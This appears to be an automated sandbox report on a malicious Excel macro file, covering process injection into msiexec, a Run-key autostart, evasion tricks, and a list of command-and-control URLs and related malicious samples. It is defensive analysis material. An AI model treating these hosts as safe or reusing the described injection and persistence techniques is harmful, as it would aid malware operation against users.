Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeProcess created: C:\Windows\System32\msiexec.exe msiexec.exeJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeUnpacked PE file: 2.2.FTBSEIi.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Detected unpacking (overwrites its own PE header)Show sources
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeUnpacked PE file: 2.2.FTBSEIi.exe.400000.0.unpack
Contains functionality to dynamically determine API callsShow sources
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_0040D8F0 LoadLibraryA,GetProcAddress,2_2_0040D8F0
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_0042B18B push esi; ret 2_2_0042B1B4
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_001BB878 push esi; ret 2_2_001BB8B1
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_001AD984 push esi; retf 2_2_001AD985
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_001AC1D3 push esp; iretd 2_2_001AC21C
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_001AA357 push edx; retf 2_2_001AA45C
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_001AA440 push edx; retf 2_2_001AA45C
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_003EA5DB push esi; ret 2_2_003EA604
Source: C:\Windows\System32\msiexec.exeCode function: 4_2_0009B18B push esi; ret 4_2_0009B1B4
Source: C:\Windows\System32\msiexec.exeCode function: 4_2_0009CCBB push edx; ret 4_2_0009CCE6

Boot Survival:

barindex
Creates an autostart registry keyShow sources
Source: C:\Windows\System32\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WitaubiJump to behavior
Source: C:\Windows\System32\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WitaubiJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain checking for process token informationShow sources
Source: C:\Windows\System32\msiexec.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-15646
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\msiexec.exe TID: 1260Thread sleep count: 31 > 30Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 2160Thread sleep count: 158 > 30Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 2160Thread sleep time: -9480000s >= -30000sJump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 2160Thread sleep time: -60000s >= -30000sJump to behavior

Anti Debugging:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_0040D8F0 LoadLibraryA,GetProcAddress,2_2_0040D8F0
Contains functionality to read the PEBShow sources
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_0041F3E0 mov eax, dword ptr fs:[00000030h]2_2_0041F3E0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_001A7CD3 push dword ptr fs:[00000030h]2_2_001A7CD3
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_003C092B mov eax, dword ptr fs:[00000030h]2_2_003C092B
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_003C0D90 mov eax, dword ptr fs:[00000030h]2_2_003C0D90
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_003DF630 mov eax, dword ptr fs:[00000030h]2_2_003DF630
Source: C:\Windows\System32\msiexec.exeCode function: 4_2_0008F3E0 mov eax, dword ptr fs:[00000030h]4_2_0008F3E0

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processesShow sources
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 70000 protect: page read and writeJump to behavior
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeMemory allocated: C:\Windows\System32\msiexec.exe base: A0000 protect: page read and writeJump to behavior
Contains functionality to inject code into remote processesShow sources
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_004172D0 EntryPoint,CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess,2_2_004172D0
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeThread register set: target process: 400Jump to behavior
Writes to foreign memory regionsShow sources
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeMemory written: C:\Windows\System32\msiexec.exe base: 70000Jump to behavior
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeMemory written: C:\Windows\System32\msiexec.exe base: A0000Jump to behavior
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeProcess created: C:\Windows\System32\msiexec.exe msiexec.exeJump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: msiexec.exe, 00000004.00000002.1511882623.00730000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: msiexec.exe, 00000004.00000002.1511882623.00730000.00000002.00000001.sdmpBinary or memory string: Progman
Source: msiexec.exe, 00000004.00000002.1511882623.00730000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

barindex
Queries the product ID of WindowsShow sources
Source: C:\Windows\System32\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

TimeTypeDescription
18:32:01API Interceptor541x Sleep call for process: msiexec.exe modified
18:32:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Witaubi C:\Users\user\AppData\Roaming\Imed\tufi.exe

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
EmergencyContact.xlsm2%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
2.3.FTBSEIi.exe.600000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
4.2.msiexec.exe.70000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.FTBSEIi.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
6.3.tufi.exe.200000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
4.3.msiexec.exe.220000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://march262020.site/post.php0%Avira URL Cloudsafe
http://www.march262020.live/post.phpAS0%Avira URL Cloudsafe
http://march262020.club/post.php0%Avira URL Cloudsafe
http://march262020.live/post.phpcs0%Avira URL Cloudsafe
http://march262020.store/post.php0%Avira URL Cloudsafe
http://www.march262020.live/post.php0%Avira URL Cloudsafe
http://www.march262020.live/post.phph0%Avira URL Cloudsafe
http://march262020.club/files/app.bin0%Avira URL Cloudsafe
http://www.march262020.live/post.php-0%Avira URL Cloudsafe
http://march262020.live/post.php0%Avira URL Cloudsafe
http://march262020.com/post.php0%Avira URL Cloudsafe
http://march262020.best/post.php0%Avira URL Cloudsafe
http://march262020.network/post.php0%Avira URL Cloudsafe
http://march262020.tech/post.php0%Avira URL Cloudsafe
http://march262020.online/post.php0%Avira URL Cloudsafe
http://march262020.live/post.phpU0%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
119.28.234.224EmergencyContact.xlsmGet hashmaliciousBrowse
    170.106.11.8EmergencyContact.xlsmGet hashmaliciousBrowse
    • march262020.com/post.php

    Domains

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    parkingpage.namecheap.comEmergencyContact.xlsmGet hashmaliciousBrowse
    • 198.54.117.218
    Resume John Doe.docGet hashmaliciousBrowse
    • 198.54.117.211
    analysis.xlsmGet hashmaliciousBrowse
    • 198.54.117.218
    analysis.xlsmGet hashmaliciousBrowse
    • 198.54.117.215
    analysis.xlsmGet hashmaliciousBrowse
    • 198.54.117.215
    2201283765ref20181203_pdf.exeGet hashmaliciousBrowse
    • 198.54.117.211
    23Order A32443u43.exeGet hashmaliciousBrowse
    • 198.54.117.215
    74Request for Quotation.exeGet hashmaliciousBrowse
    • 198.54.117.218
    PO OMULQP214R8.xlsxGet hashmaliciousBrowse
    • 198.54.117.215
    12PO Order No. 305930960MN.exeGet hashmaliciousBrowse
    • 198.54.117.211
    faktura_151018_9022871.vbsGet hashmaliciousBrowse
    • 198.54.117.218
    faktura_111018_0077975.vbsGet hashmaliciousBrowse
    • 198.54.117.215
    13PAYMENT-Jawharat Al-Wefaq Gen. Trad. & Cont. Corp.docGet hashmaliciousBrowse
    • 198.54.117.211
    22DOC1.exeGet hashmaliciousBrowse
    • 198.54.117.215
    42PAYMENT INSTRUCTION.exeGet hashmaliciousBrowse
    • 198.54.117.210
    15request.exeGet hashmaliciousBrowse
    • 198.54.117.215
    7INV_P-130828-01.exeGet hashmaliciousBrowse
    • 198.54.117.216
    http://blockchaln.infoGet hashmaliciousBrowse
    • 198.54.117.215
    17scantr doc.exeGet hashmaliciousBrowse
    • 198.54.117.211
    69IMG_0047.exeGet hashmaliciousBrowse
    • 198.54.117.211
    march262020.clubEmergencyContact.xlsmGet hashmaliciousBrowse
    • 170.106.11.8

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    unknownEmergencyContact.xlsmGet hashmaliciousBrowse
    • 162.255.119.36
    New inv.976215.xlsGet hashmaliciousBrowse
    • 192.168.2.255
    sample1-unpacked.exeGet hashmaliciousBrowse
    • 16.121.0.129
    sample1-unpacked.exeGet hashmaliciousBrowse
    • 16.91.196.254
    Req_Form6982.xlsGet hashmaliciousBrowse
    • 47.91.88.100
    sample1.exeGet hashmaliciousBrowse
    • 167.89.123.54
    rept-1194.xlsGet hashmaliciousBrowse
    • 47.91.88.100
    sample1.exeGet hashmaliciousBrowse
    • 16.100.81.99
    https://ankitchawlaphotography.com/staple/433426.zipGet hashmaliciousBrowse
    • 127.0.0.1
    https://onedrive.live.com/redir?resid=3A73AD1A7DAF274C!1235&authkey=!AMMPdXLDeVZdNDs&ithint=file%2cpdfGet hashmaliciousBrowse
    • 52.114.132.20
    https://carexpert.ee/2rehvid/api/hotmail-verifly/index.php?email=martin.piller@abcsupply.comGet hashmaliciousBrowse
    • 88.99.147.202
    Invoice-No-583.xlsGet hashmaliciousBrowse
    • 47.91.88.100
    http://perfumegallery.com.au/OMACH/FBG/Get hashmaliciousBrowse
    • 162.241.174.123
    http://d19b4k8ycsi5o2.cloudfront.net/d/?id=jHhgjdgd-JHShgfs-JHsgsh&p1=innodom53.com/man/alessandroa@herbalife.comGet hashmaliciousBrowse
    • 152.199.23.37
    cybx.jsGet hashmaliciousBrowse
    • 180.180.123.9
    cybx.jsGet hashmaliciousBrowse
    • 180.180.123.9
    recoverit_setup_full4174.exeGet hashmaliciousBrowse
    • 47.91.67.36
    Invoice_ID.787228.xlsGet hashmaliciousBrowse
    • 47.91.88.100
    Info.42171.xlsGet hashmaliciousBrowse
    • 192.168.2.255
    open_presentation_m8w.jsGet hashmaliciousBrowse
    • 5.53.125.140
    unknownEmergencyContact.xlsmGet hashmaliciousBrowse
    • 162.255.119.36
    New inv.976215.xlsGet hashmaliciousBrowse
    • 192.168.2.255
    sample1-unpacked.exeGet hashmaliciousBrowse
    • 16.121.0.129
    sample1-unpacked.exeGet hashmaliciousBrowse
    • 16.91.196.254
    Req_Form6982.xlsGet hashmaliciousBrowse
    • 47.91.88.100
    sample1.exeGet hashmaliciousBrowse
    • 167.89.123.54
    rept-1194.xlsGet hashmaliciousBrowse
    • 47.91.88.100
    sample1.exeGet hashmaliciousBrowse
    • 16.100.81.99
    https://ankitchawlaphotography.com/staple/433426.zipGet hashmaliciousBrowse
    • 127.0.0.1
    https://onedrive.live.com/redir?resid=3A73AD1A7DAF274C!1235&authkey=!AMMPdXLDeVZdNDs&ithint=file%2cpdfGet hashmaliciousBrowse
    • 52.114.132.20
    https://carexpert.ee/2rehvid/api/hotmail-verifly/index.php?email=martin.piller@abcsupply.comGet hashmaliciousBrowse
    • 88.99.147.202
    Invoice-No-583.xlsGet hashmaliciousBrowse
    • 47.91.88.100
    http://perfumegallery.com.au/OMACH/FBG/Get hashmaliciousBrowse
    • 162.241.174.123
    http://d19b4k8ycsi5o2.cloudfront.net/d/?id=jHhgjdgd-JHShgfs-JHsgsh&p1=innodom53.com/man/alessandroa@herbalife.comGet hashmaliciousBrowse
    • 152.199.23.37
    cybx.jsGet hashmaliciousBrowse
    • 180.180.123.9
    cybx.jsGet hashmaliciousBrowse
    • 180.180.123.9
    recoverit_setup_full4174.exeGet hashmaliciousBrowse
    • 47.91.67.36
    Invoice_ID.787228.xlsGet hashmaliciousBrowse
    • 47.91.88.100
    Info.42171.xlsGet hashmaliciousBrowse
    • 192.168.2.255
    open_presentation_m8w.jsGet hashmaliciousBrowse
    • 5.53.125.140

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.